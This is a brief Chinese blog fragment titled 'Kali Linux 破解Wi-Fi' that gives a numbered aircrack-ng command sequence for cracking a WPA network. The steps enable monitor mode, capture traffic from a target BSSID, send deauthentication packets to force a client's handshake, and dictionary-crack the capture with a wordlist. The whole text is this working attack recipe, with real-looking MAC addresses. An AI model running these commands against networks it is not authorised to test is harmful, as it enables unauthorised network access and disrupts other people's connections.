1.airmon-ng
2.airmon-ng start wlan0 #找到monitor mode enabled on 。。。。(mon0)
3.airodump-ng mon0 #ok 用户ctrl+c
4.airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop mon0. 找到00:14:BF:E0:E8:D5 4C:EB:42:59:DE:31 -9 54 -54 0 7
5.aireplay-ng -0 2 -a 00:14:BF:E0:E8:D5 -c 4C:EB:42:59:DE:31 mon0 #WPA handshake:00:14..
6.
aircrack-ng -a2 -b 00:14:.. -w root/wpa.txt root/Desktop/*.cap
Opening /root/Desktop/.cap
Kali Linux 破解Wi-Fi
最新推荐文章于 2024-09-21 09:41:25 发布